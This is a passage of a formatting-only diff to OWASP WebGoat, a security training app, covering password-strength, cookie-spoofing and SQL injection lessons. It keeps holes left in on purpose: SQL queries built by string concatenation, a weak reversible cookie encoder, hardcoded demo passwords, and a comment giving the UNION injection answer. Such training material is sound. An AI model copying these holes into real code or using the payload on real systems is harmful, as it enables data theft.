-    public AttackResult completed(@RequestParam String password) {
-        Zxcvbn zxcvbn = new Zxcvbn();
-        StringBuilder output = new StringBuilder();
-        DecimalFormat df = new DecimalFormat("0", DecimalFormatSymbols.getInstance(Locale.ENGLISH));
-        df.setMaximumFractionDigits(340);
-        Strength strength = zxcvbn.measure(password);
+  @PostMapping("SecurePasswords/assignment")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String password) {
+    Zxcvbn zxcvbn = new Zxcvbn();
+    StringBuilder output = new StringBuilder();
+    DecimalFormat df = new DecimalFormat("0", DecimalFormatSymbols.getInstance(Locale.ENGLISH));
+    df.setMaximumFractionDigits(340);
+    Strength strength = zxcvbn.measure(password);
 
-        output.append("<b>Your Password: *******</b></br>");
-        output.append("<b>Length: </b>" + password.length() + "</br>");
-        output.append("<b>Estimated guesses needed to crack your password: </b>" + df.format(strength.getGuesses()) + "</br>");
-        output.append("<div style=\"float: left;padding-right: 10px;\"><b>Score: </b>" + strength.getScore() + "/4 </div>");
-        if (strength.getScore() <= 1) {
-            output.append("<div style=\"background-color:red;width: 200px;border-radius: 12px;float: left;\">&nbsp;</div></br>");
-        } else if (strength.getScore() <= 3) {
-            output.append("<div style=\"background-color:orange;width: 200px;border-radius: 12px;float: left;\">&nbsp;</div></br>");
-        } else {
-            output.append("<div style=\"background-color:green;width: 200px;border-radius: 12px;float: left;\">&nbsp;</div></br>");
-        }
-        output.append("<b>Estimated cracking time: </b>" + calculateTime((long) strength.getCrackTimeSeconds().getOnlineNoThrottling10perSecond()) + "</br>");
-        if (strength.getFeedback().getWarning().length() != 0)
-            output.append("<b>Warning: </b>" + strength.getFeedback().getWarning() + "</br>");
-        // possible feedback: https://github.com/dropbox/zxcvbn/blob/master/src/feedback.coffee
-        // maybe ask user to try also weak passwords to see and understand feedback?
-        if (strength.getFeedback().getSuggestions().size() != 0) {
-            output.append("<b>Suggestions:</b></br><ul>");
-            for (String sug : strength.getFeedback().getSuggestions()) output.append("<li>" + sug + "</li>");
-            output.append("</ul></br>");
-        }
-        output.append("<b>Score: </b>" + strength.getScore() + "/4 </br>");
-
-        if (strength.getScore() >= 4)
-            return success(this).feedback("securepassword-success").output(output.toString()).build();
-        else
-            return failed(this).feedback("securepassword-failed").output(output.toString()).build();
+    output.append("<b>Your Password: *******</b></br>");
+    output.append("<b>Length: </b>" + password.length() + "</br>");
+    output.append(
+        "<b>Estimated guesses needed to crack your password: </b>"
+            + df.format(strength.getGuesses())
+            + "</br>");
+    output.append(
+        "<div style=\"float: left;padding-right: 10px;\"><b>Score: </b>"
+            + strength.getScore()
+            + "/4 </div>");
+    if (strength.getScore() <= 1) {
+      output.append(
+          "<div style=\"background-color:red;width: 200px;border-radius: 12px;float:"
+              + " left;\">&nbsp;</div></br>");
+    } else if (strength.getScore() <= 3) {
+      output.append(
+          "<div style=\"background-color:orange;width: 200px;border-radius: 12px;float:"
+              + " left;\">&nbsp;</div></br>");
+    } else {
+      output.append(
+          "<div style=\"background-color:green;width: 200px;border-radius: 12px;float:"
+              + " left;\">&nbsp;</div></br>");
     }
-
-    public static String calculateTime(long seconds) {
-        int s = 1;
-        int min = (60 * s);
-        int hr = (60 * min);
-        int d = (24 * hr);
-        int yr = (365 * d);
-
-        long years = seconds / (d) / 365;
-        long days = (seconds % yr) / (d);
-        long hours = (seconds % d) / (hr);
-        long minutes = (seconds % hr) / (min);
-        long sec = (seconds % min * s);
-
-        return (years + " years " + days + " days " + hours + " hours " + minutes + " minutes " + sec + " seconds");
+    output.append(
+        "<b>Estimated cracking time: </b>"
+            + calculateTime(
+                (long) strength.getCrackTimeSeconds().getOnlineNoThrottling10perSecond())
+            + "</br>");
+    if (strength.getFeedback().getWarning().length() != 0)
+      output.append("<b>Warning: </b>" + strength.getFeedback().getWarning() + "</br>");
+    // possible feedback: https://github.com/dropbox/zxcvbn/blob/master/src/feedback.coffee
+    // maybe ask user to try also weak passwords to see and understand feedback?
+    if (strength.getFeedback().getSuggestions().size() != 0) {
+      output.append("<b>Suggestions:</b></br><ul>");
+      for (String sug : strength.getFeedback().getSuggestions())
+        output.append("<li>" + sug + "</li>");
+      output.append("</ul></br>");
     }
+    output.append("<b>Score: </b>" + strength.getScore() + "/4 </br>");
+
+    if (strength.getScore() >= 4)
+      return success(this).feedback("securepassword-success").output(output.toString()).build();
+    else return failed(this).feedback("securepassword-failed").output(output.toString()).build();
+  }
+
+  public static String calculateTime(long seconds) {
+    int s = 1;
+    int min = (60 * s);
+    int hr = (60 * min);
+    int d = (24 * hr);
+    int yr = (365 * d);
+
+    long years = seconds / (d) / 365;
+    long days = (seconds % yr) / (d);
+    long hours = (seconds % d) / (hr);
+    long minutes = (seconds % hr) / (min);
+    long sec = (seconds % min * s);
+
+    return (years
+        + " years "
+        + days
+        + " days "
+        + hours
+        + " hours "
+        + minutes
+        + " minutes "
+        + sec
+        + " seconds");
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookie.java b/src/main/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookie.java
index b89627b42..f9552416e 100644
--- a/src/main/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookie.java
+++ b/src/main/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookie.java
@@ -35,13 +35,13 @@ import org.springframework.stereotype.Component;
 @Component
 public class SpoofCookie extends Lesson {
 
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A1;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A1;
+  }
 
-    @Override
-    public String getTitle() {
-        return "spoofcookie.title";
-    }
+  @Override
+  public String getTitle() {
+    return "spoofcookie.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookieAssignment.java b/src/main/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookieAssignment.java
index b9af34d24..2efc739f6 100644
--- a/src/main/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookieAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookieAssignment.java
@@ -23,10 +23,8 @@
 package org.owasp.webgoat.lessons.spoofcookie;
 
 import java.util.Map;
-
 import javax.servlet.http.Cookie;
 import javax.servlet.http.HttpServletResponse;
-
 import org.apache.commons.lang3.StringUtils;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
@@ -49,73 +47,79 @@ import org.springframework.web.bind.annotation.RestController;
 @RestController
 public class SpoofCookieAssignment extends AssignmentEndpoint {
 
-    private static final String COOKIE_NAME = "spoof_auth";
-    private static final String COOKIE_INFO = "Cookie details for user %s:<br />" + COOKIE_NAME + "=%s";
-    private static final String ATTACK_USERNAME = "tom";
+  private static final String COOKIE_NAME = "spoof_auth";
+  private static final String COOKIE_INFO =
+      "Cookie details for user %s:<br />" + COOKIE_NAME + "=%s";
+  private static final String ATTACK_USERNAME = "tom";
 
-    private static final Map<String, String> users = Map.of(
-        "webgoat", "webgoat",
-        "admin", "admin",
-        ATTACK_USERNAME, "apasswordfortom");
+  private static final Map<String, String> users =
+      Map.of("webgoat", "webgoat", "admin", "admin", ATTACK_USERNAME, "apasswordfortom");
 
-    @PostMapping(path = "/SpoofCookie/login")
-    @ResponseBody
-    @ExceptionHandler(UnsatisfiedServletRequestParameterException.class)
-    public AttackResult login(
-        @RequestParam String username,
-        @RequestParam String password,
-        @CookieValue(value = COOKIE_NAME, required = false) String cookieValue,
-        HttpServletResponse response) {
+  @PostMapping(path = "/SpoofCookie/login")
+  @ResponseBody
+  @ExceptionHandler(UnsatisfiedServletRequestParameterException.class)
+  public AttackResult login(
+      @RequestParam String username,
+      @RequestParam String password,
+      @CookieValue(value = COOKIE_NAME, required = false) String cookieValue,
+      HttpServletResponse response) {
 
-        if (StringUtils.isEmpty(cookieValue)) {
-            return credentialsLoginFlow(username, password, response);
-        } else {
-            return cookieLoginFlow(cookieValue);
-        }
+    if (StringUtils.isEmpty(cookieValue)) {
+      return credentialsLoginFlow(username, password, response);
+    } else {
+      return cookieLoginFlow(cookieValue);
+    }
+  }
+
+  @GetMapping(path = "/SpoofCookie/cleanup")
+  public void cleanup(HttpServletResponse response) {
+    Cookie cookie = new Cookie(COOKIE_NAME, "");
+    cookie.setMaxAge(0);
+    response.addCookie(cookie);
+  }
+
+  private AttackResult credentialsLoginFlow(
+      String username, String password, HttpServletResponse response) {
+    String lowerCasedUsername = username.toLowerCase();
+    if (ATTACK_USERNAME.equals(lowerCasedUsername)
+        && users.get(lowerCasedUsername).equals(password)) {
+      return informationMessage(this).feedback("spoofcookie.cheating").build();
     }
 
-    @GetMapping(path = "/SpoofCookie/cleanup")
-    public void cleanup(HttpServletResponse response) {
-        Cookie cookie = new Cookie(COOKIE_NAME, "");
-        cookie.setMaxAge(0);
-        response.addCookie(cookie);
+    String authPassword = users.getOrDefault(lowerCasedUsername, "");
+    if (!authPassword.isBlank() && authPassword.equals(password)) {
+      String newCookieValue = EncDec.encode(lowerCasedUsername);
+      Cookie newCookie = new Cookie(COOKIE_NAME, newCookieValue);
+      newCookie.setPath("/WebGoat");
+      newCookie.setSecure(true);
+      response.addCookie(newCookie);
+      return informationMessage(this)
+          .feedback("spoofcookie.login")
+          .output(String.format(COOKIE_INFO, lowerCasedUsername, newCookie.getValue()))
+          .build();
     }
 
-    private AttackResult credentialsLoginFlow(String username, String password, HttpServletResponse response) {
-        String lowerCasedUsername = username.toLowerCase();
-        if (ATTACK_USERNAME.equals(lowerCasedUsername) && users.get(lowerCasedUsername).equals(password)) {
-            return informationMessage(this).feedback("spoofcookie.cheating").build();
-        }
+    return informationMessage(this).feedback("spoofcookie.wrong-login").build();
+  }
 
-        String authPassword = users.getOrDefault(lowerCasedUsername, "");
-        if (!authPassword.isBlank() && authPassword.equals(password)) {
-            String newCookieValue = EncDec.encode(lowerCasedUsername);
-            Cookie newCookie = new Cookie(COOKIE_NAME, newCookieValue);
-            newCookie.setPath("/WebGoat");
-            newCookie.setSecure(true);
-            response.addCookie(newCookie);
-            return informationMessage(this).feedback("spoofcookie.login").output(String.format(COOKIE_INFO, lowerCasedUsername, newCookie.getValue())).build();
-        }
-
-        return informationMessage(this).feedback("spoofcookie.wrong-login").build();
-    }
-
-    private AttackResult cookieLoginFlow(String cookieValue) {
-        String cookieUsername;
-        try {
-            cookieUsername = EncDec.decode(cookieValue).toLowerCase();
-        } catch (Exception e) {
-            // for providing some instructive guidance, we won't return 4xx error here
-            return failed(this).output(e.getMessage()).build();
-        }
-        if (users.containsKey(cookieUsername)) {
-            if (cookieUsername.equals(ATTACK_USERNAME)) {
-                return success(this).build();
-            }
-            return failed(this).feedback("spoofcookie.cookie-login").output(String.format(COOKIE_INFO, cookieUsername, cookieValue)).build();
-        }
-
-        return failed(this).feedback("spoofcookie.wrong-cookie").build();
+  private AttackResult cookieLoginFlow(String cookieValue) {
+    String cookieUsername;
+    try {
+      cookieUsername = EncDec.decode(cookieValue).toLowerCase();
+    } catch (Exception e) {
+      // for providing some instructive guidance, we won't return 4xx error here
+      return failed(this).output(e.getMessage()).build();
+    }
+    if (users.containsKey(cookieUsername)) {
+      if (cookieUsername.equals(ATTACK_USERNAME)) {
+        return success(this).build();
+      }
+      return failed(this)
+          .feedback("spoofcookie.cookie-login")
+          .output(String.format(COOKIE_INFO, cookieUsername, cookieValue))
+          .build();
     }
 
+    return failed(this).feedback("spoofcookie.wrong-cookie").build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/spoofcookie/encoders/EncDec.java b/src/main/java/org/owasp/webgoat/lessons/spoofcookie/encoders/EncDec.java
index 8f933db3a..d5aa4cf7d 100644
--- a/src/main/java/org/owasp/webgoat/lessons/spoofcookie/encoders/EncDec.java
+++ b/src/main/java/org/owasp/webgoat/lessons/spoofcookie/encoders/EncDec.java
@@ -24,7 +24,6 @@ package org.owasp.webgoat.lessons.spoofcookie.encoders;
 
 import java.nio.charset.StandardCharsets;
 import java.util.Base64;
-
 import org.apache.commons.lang3.RandomStringUtils;
 import org.springframework.security.crypto.codec.Hex;
 
@@ -36,63 +35,54 @@ import org.springframework.security.crypto.codec.Hex;
 
 public class EncDec {
 
-    // PoC: weak encoding method
+  // PoC: weak encoding method
 
-    private static final String SALT = RandomStringUtils.randomAlphabetic(10);
+  private static final String SALT = RandomStringUtils.randomAlphabetic(10);
 
-    private EncDec() {
+  private EncDec() {}
 
+  public static String encode(final String value) {
+    if (value == null) {
+      return null;
     }
 
-    public static String encode(final String value) {
-        if (value == null) {
-            return null;
-        }
+    String encoded = value.toLowerCase() + SALT;
+    encoded = revert(encoded);
+    encoded = hexEncode(encoded);
+    return base64Encode(encoded);
+  }
 
-        String encoded = value.toLowerCase() + SALT;
-        encoded = revert(encoded);
-        encoded = hexEncode(encoded);
-        return base64Encode(encoded);
+  public static String decode(final String encodedValue) throws IllegalArgumentException {
+    if (encodedValue == null) {
+      return null;
     }
 
-    public static String decode(final String encodedValue) throws IllegalArgumentException {
-        if (encodedValue == null) {
-            return null;
-        }
+    String decoded = base64Decode(encodedValue);
+    decoded = hexDecode(decoded);
+    decoded = revert(decoded);
+    return decoded.substring(0, decoded.length() - SALT.length());
+  }
 
-        String decoded = base64Decode(encodedValue);
-        decoded = hexDecode(decoded);
-        decoded = revert(decoded);
-        return decoded.substring(0, decoded.length() - SALT.length());
-    }
+  private static String revert(final String value) {
+    return new StringBuilder(value).reverse().toString();
+  }
 
-    private static String revert(final String value) {
-        return new StringBuilder(value)
-            .reverse()
-            .toString();
-    }
+  private static String hexEncode(final String value) {
+    char[] encoded = Hex.encode(value.getBytes(StandardCharsets.UTF_8));
+    return new String(encoded);
+  }
 
-    private static String hexEncode(final String value) {
-        char[] encoded = Hex.encode(value.getBytes(StandardCharsets.UTF_8));
-        return new String(encoded);
-    }
+  private static String hexDecode(final String value) {
+    byte[] decoded = Hex.decode(value);
+    return new String(decoded);
+  }
 
-    private static String hexDecode(final String value) {
-        byte[] decoded = Hex.decode(value);
-        return new String(decoded);
-    }
-
-    private static String base64Encode(final String value) {
-        return Base64
-            .getEncoder()
-            .encodeToString(value.getBytes());
-    }
-
-    private static String base64Decode(final String value) {
-        byte[] decoded = Base64
-            .getDecoder()
-            .decode(value.getBytes());
-        return new String(decoded);
-    }
+  private static String base64Encode(final String value) {
+    return Base64.getEncoder().encodeToString(value.getBytes());
+  }
 
+  private static String base64Decode(final String value) {
+    byte[] decoded = Base64.getDecoder().decode(value.getBytes());
+    return new String(decoded);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionAdvanced.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionAdvanced.java
index 39119f875..aa2492703 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionAdvanced.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionAdvanced.java
@@ -28,13 +28,13 @@ import org.springframework.stereotype.Component;
 
 @Component
 public class SqlInjectionAdvanced extends Lesson {
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A3; 
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A3;
+  }
 
-    @Override
-    public String getTitle() {
-        return "2.sql.advanced.title";
-    }
+  @Override
+  public String getTitle() {
+    return "2.sql.advanced.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionChallenge.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionChallenge.java
index 63efbdda0..95f86ca02 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionChallenge.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionChallenge.java
@@ -22,6 +22,7 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.advanced;
 
+import java.sql.*;
 import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
@@ -33,66 +34,71 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.sql.*;
-
 /**
  * @author nbaars
  * @since 4/8/17.
  */
 @RestController
-@AssignmentHints(value = {"SqlInjectionChallenge1", "SqlInjectionChallenge2", "SqlInjectionChallenge3"})
+@AssignmentHints(
+    value = {"SqlInjectionChallenge1", "SqlInjectionChallenge2", "SqlInjectionChallenge3"})
 @Slf4j
 public class SqlInjectionChallenge extends AssignmentEndpoint {
 
-    private final LessonDataSource dataSource;
+  private final LessonDataSource dataSource;
 
-    public SqlInjectionChallenge(LessonDataSource dataSource) {
-        this.dataSource = dataSource;
-    }
+  public SqlInjectionChallenge(LessonDataSource dataSource) {
+    this.dataSource = dataSource;
+  }
 
-    @PutMapping("/SqlInjectionAdvanced/challenge")
-    //assignment path is bounded to class so we use different http method :-)
-    @ResponseBody
-    public AttackResult registerNewUser(@RequestParam String username_reg, @RequestParam String email_reg, @RequestParam String password_reg) throws Exception {
-        AttackResult attackResult = checkArguments(username_reg, email_reg, password_reg);
+  @PutMapping("/SqlInjectionAdvanced/challenge")
+  // assignment path is bounded to class so we use different http method :-)
+  @ResponseBody
+  public AttackResult registerNewUser(
+      @RequestParam String username_reg,
+      @RequestParam String email_reg,
+      @RequestParam String password_reg)
+      throws Exception {
+    AttackResult attackResult = checkArguments(username_reg, email_reg, password_reg);
 
-        if (attackResult == null) {
+    if (attackResult == null) {
 
+      try (Connection connection = dataSource.getConnection()) {
+        String checkUserQuery =
+            "select userid from sql_challenge_users where userid = '" + username_reg + "'";
+        Statement statement = connection.createStatement();
+        ResultSet resultSet = statement.executeQuery(checkUserQuery);
 
-            try (Connection connection = dataSource.getConnection()) {
-                String checkUserQuery = "select userid from sql_challenge_users where userid = '" + username_reg + "'";
-                Statement statement = connection.createStatement();
-                ResultSet resultSet = statement.executeQuery(checkUserQuery);
-
-                if (resultSet.next()) {
-                    if (username_reg.contains("tom'")) {
-                        attackResult = success(this).feedback("user.exists").build();
-                    } else {
-                        attackResult = failed(this).feedback("user.exists").feedbackArgs(username_reg).build();
-                    }
-                } else {
-                    PreparedStatement preparedStatement = connection.prepareStatement("INSERT INTO sql_challenge_users VALUES (?, ?, ?)");
-                    preparedStatement.setString(1, username_reg);
-                    preparedStatement.setString(2, email_reg);
-                    preparedStatement.setString(3, password_reg);
-                    preparedStatement.execute();
-                    attackResult = success(this).feedback("user.created").feedbackArgs(username_reg).build();
-                }
-            } catch (SQLException e) {
-                attackResult = failed(this).output("Something went wrong").build();
-            }
+        if (resultSet.next()) {
+          if (username_reg.contains("tom'")) {
+            attackResult = success(this).feedback("user.exists").build();
+          } else {
+            attackResult = failed(this).feedback("user.exists").feedbackArgs(username_reg).build();
+          }
+        } else {
+          PreparedStatement preparedStatement =
+              connection.prepareStatement("INSERT INTO sql_challenge_users VALUES (?, ?, ?)");
+          preparedStatement.setString(1, username_reg);
+          preparedStatement.setString(2, email_reg);
+          preparedStatement.setString(3, password_reg);
+          preparedStatement.execute();
+          attackResult = success(this).feedback("user.created").feedbackArgs(username_reg).build();
         }
-        return attackResult;
+      } catch (SQLException e) {
+        attackResult = failed(this).output("Something went wrong").build();
+      }
     }
+    return attackResult;
+  }
 
-    private AttackResult checkArguments(String username_reg, String email_reg, String password_reg) {
-        if (StringUtils.isEmpty(username_reg) || StringUtils.isEmpty(email_reg) || StringUtils.isEmpty(password_reg)) {
-            return failed(this).feedback("input.invalid").build();
-        }
-        if (username_reg.length() > 250 || email_reg.length() > 30 || password_reg.length() > 30) {
-            return failed(this).feedback("input.invalid").build();
-        }
-        return null;
+  private AttackResult checkArguments(String username_reg, String email_reg, String password_reg) {
+    if (StringUtils.isEmpty(username_reg)
+        || StringUtils.isEmpty(email_reg)
+        || StringUtils.isEmpty(password_reg)) {
+      return failed(this).feedback("input.invalid").build();
     }
+    if (username_reg.length() > 250 || email_reg.length() > 30 || password_reg.length() > 30) {
+      return failed(this).feedback("input.invalid").build();
+    }
+    return null;
+  }
 }
-
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionChallengeLogin.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionChallengeLogin.java
index baaa1965b..bdfcc88f2 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionChallengeLogin.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionChallengeLogin.java
@@ -32,30 +32,40 @@ import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
 @RestController
-@AssignmentHints(value = {"SqlInjectionChallengeHint1", "SqlInjectionChallengeHint2", "SqlInjectionChallengeHint3", "SqlInjectionChallengeHint4"})
+@AssignmentHints(
+    value = {
+      "SqlInjectionChallengeHint1",
+      "SqlInjectionChallengeHint2",
+      "SqlInjectionChallengeHint3",
+      "SqlInjectionChallengeHint4"
+    })
 public class SqlInjectionChallengeLogin extends AssignmentEndpoint {
 
-    private final LessonDataSource dataSource;
+  private final LessonDataSource dataSource;
 
-    public SqlInjectionChallengeLogin(LessonDataSource dataSource) {
-        this.dataSource = dataSource;
-    }
-
-    @PostMapping("/SqlInjectionAdvanced/challenge_Login")
-    @ResponseBody
-    public AttackResult login(@RequestParam String username_login, @RequestParam String password_login) throws Exception {
-        try (var connection = dataSource.getConnection()) {
-            var statement = connection.prepareStatement("select password from sql_challenge_users where userid = ? and password = ?");
-            statement.setString(1, username_login);
-            statement.setString(2, password_login);
-            var resultSet = statement.executeQuery();
-
-            if (resultSet.next()) {
-                return ("tom".equals(username_login)) ? success(this).build()
-                        : failed(this).feedback("ResultsButNotTom").build();
-            } else {
-                return failed(this).feedback("NoResultsMatched").build();
-            }
-        }
+  public SqlInjectionChallengeLogin(LessonDataSource dataSource) {
+    this.dataSource = dataSource;
+  }
+
+  @PostMapping("/SqlInjectionAdvanced/challenge_Login")
+  @ResponseBody
+  public AttackResult login(
+      @RequestParam String username_login, @RequestParam String password_login) throws Exception {
+    try (var connection = dataSource.getConnection()) {
+      var statement =
+          connection.prepareStatement(
+              "select password from sql_challenge_users where userid = ? and password = ?");
+      statement.setString(1, username_login);
+      statement.setString(2, password_login);
+      var resultSet = statement.executeQuery();
+
+      if (resultSet.next()) {
+        return ("tom".equals(username_login))
+            ? success(this).build()
+            : failed(this).feedback("ResultsButNotTom").build();
+      } else {
+        return failed(this).feedback("NoResultsMatched").build();
+      }
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionLesson6a.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionLesson6a.java
index ef4c4c0c1..313c73910 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionLesson6a.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionLesson6a.java
@@ -22,6 +22,7 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.advanced;
 
+import java.sql.*;
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
@@ -32,67 +33,84 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.sql.*;
-
-
 @RestController
-@AssignmentHints(value = {"SqlStringInjectionHint-advanced-6a-1", "SqlStringInjectionHint-advanced-6a-2", "SqlStringInjectionHint-advanced-6a-3",
-        "SqlStringInjectionHint-advanced-6a-4", "SqlStringInjectionHint-advanced-6a-5"})
+@AssignmentHints(
+    value = {
+      "SqlStringInjectionHint-advanced-6a-1",
+      "SqlStringInjectionHint-advanced-6a-2",
+      "SqlStringInjectionHint-advanced-6a-3",
+      "SqlStringInjectionHint-advanced-6a-4",
+      "SqlStringInjectionHint-advanced-6a-5"
+    })
 public class SqlInjectionLesson6a extends AssignmentEndpoint {
 
-    private final LessonDataSource dataSource;
-    private static final String YOUR_QUERY_WAS = "<br> Your query was: ";
-    public SqlInjectionLesson6a(LessonDataSource dataSource) {
-        this.dataSource = dataSource;
-    }
+  private final LessonDataSource dataSource;
+  private static final String YOUR_QUERY_WAS = "<br> Your query was: ";
 
-    @PostMapping("/SqlInjectionAdvanced/attack6a")
-    @ResponseBody
-    public AttackResult completed(@RequestParam(value="userid_6a")  String userId) {
-        return injectableQuery(userId);
-        // The answer: Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from user_system_data --
-    }
+  public SqlInjectionLesson6a(LessonDataSource dataSource) {
+    this.dataSource = dataSource;
+  }
 
-    public AttackResult injectableQuery(String accountName) {
-        String query = "";
-        try (Connection connection = dataSource.getConnection()) {
-            boolean usedUnion = true;
-            query = "SELECT * FROM user_data WHERE last_name = '" + accountName + "'";
-            //Check if Union is used
-            if (!accountName.matches("(?i)(^[^-/*;)]*)(\\s*)UNION(.*$)")) {
-                usedUnion = false;
-            }
-            try (Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-                    ResultSet.CONCUR_READ_ONLY)) {
-                ResultSet results = statement.executeQuery(query);
+  @PostMapping("/SqlInjectionAdvanced/attack6a")
+  @ResponseBody
+  public AttackResult completed(@RequestParam(value = "userid_6a") String userId) {
+    return injectableQuery(userId);
+    // The answer: Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from
+    // user_system_data --
+  }
 
-                if ((results != null) && results.first()) {
-                    ResultSetMetaData resultsMetaData = results.getMetaData();
-                    StringBuilder output = new StringBuilder();
+  public AttackResult injectableQuery(String accountName) {
+    String query = "";
+    try (Connection connection = dataSource.getConnection()) {
+      boolean usedUnion = true;
+      query = "SELECT * FROM user_data WHERE last_name = '" + accountName + "'";
+      // Check if Union is used
+      if (!accountName.matches("(?i)(^[^-/*;)]*)(\\s*)UNION(.*$)")) {
+        usedUnion = false;
+      }
+      try (Statement statement =
+          connection.createStatement(
+              ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY)) {
+        ResultSet results = statement.executeQuery(query);
 
-                    output.append(SqlInjectionLesson5a.writeTable(results, resultsMetaData));
+        if ((results != null) && results.first()) {
+          ResultSetMetaData resultsMetaData = results.getMetaData();
+          StringBuilder output = new StringBuilder();
 
-                    String appendingWhenSucceded;
-                    if (usedUnion)
-                        appendingWhenSucceded = "Well done! Can you also figure out a solution, by appending a new SQL Statement?";
-                    else
-                        appendingWhenSucceded = "Well done! Can you also figure out a solution, by using a UNION?";
-                    results.last();
+          output.append(SqlInjectionLesson5a.writeTable(results, resultsMetaData));
 
-                    if (output.toString().contains("dave") && output.toString().contains("passW0rD")) {
-                        output.append(appendingWhenSucceded);
-                        return success(this).feedback("sql-injection.advanced.6a.success").feedbackArgs(output.toString()).output(" Your query was: " + query).build();
-                    } else {
-                        return failed(this).output(output.toString() + YOUR_QUERY_WAS + query).build();
-                    }
-                } else {
-                    return failed(this).feedback("sql-injection.advanced.6a.no.results").output(YOUR_QUERY_WAS + query).build();
-                }
-            } catch (SQLException sqle) {
-                return failed(this).output(sqle.getMessage() + YOUR_QUERY_WAS + query).build();
-            }
-        } catch (Exception e) {
-            return failed(this).output(this.getClass().getName() + " : " + e.getMessage() + YOUR_QUERY_WAS + query).build();
+          String appendingWhenSucceded;
+          if (usedUnion)
+            appendingWhenSucceded =
+                "Well done! Can you also figure out a solution, by appending a new SQL Statement?";
+          else
+            appendingWhenSucceded =
+                "Well done! Can you also figure out a solution, by using a UNION?";
+          results.last();
+
+          if (output.toString().contains("dave") && output.toString().contains("passW0rD")) {
+            output.append(appendingWhenSucceded);
+            return success(this)
+                .feedback("sql-injection.advanced.6a.success")
+                .feedbackArgs(output.toString())
+                .output(" Your query was: " + query)
+                .build();
+          } else {
+            return failed(this).output(output.toString() + YOUR_QUERY_WAS + query).build();
+          }
+        } else {
+          return failed(this)
+              .feedback("sql-injection.advanced.6a.no.results")
+              .output(YOUR_QUERY_WAS + query)
+              .build();
         }
+      } catch (SQLException sqle) {
+        return failed(this).output(sqle.getMessage() + YOUR_QUERY_WAS + query).build();
+      }
+    } catch (Exception e) {
+      return failed(this)
+          .output(this.getClass().getName() + " : " + e.getMessage() + YOUR_QUERY_WAS + query)
+          .build();
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionLesson6b.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionLesson6b.java
index 602c921b1..5cf42437f 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionLesson6b.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionLesson6b.java
@@ -1,4 +1,3 @@
-
 /*
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
  *
@@ -23,6 +22,11 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.advanced;
 
+import java.io.IOException;
+import java.sql.Connection;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
@@ -31,52 +35,46 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
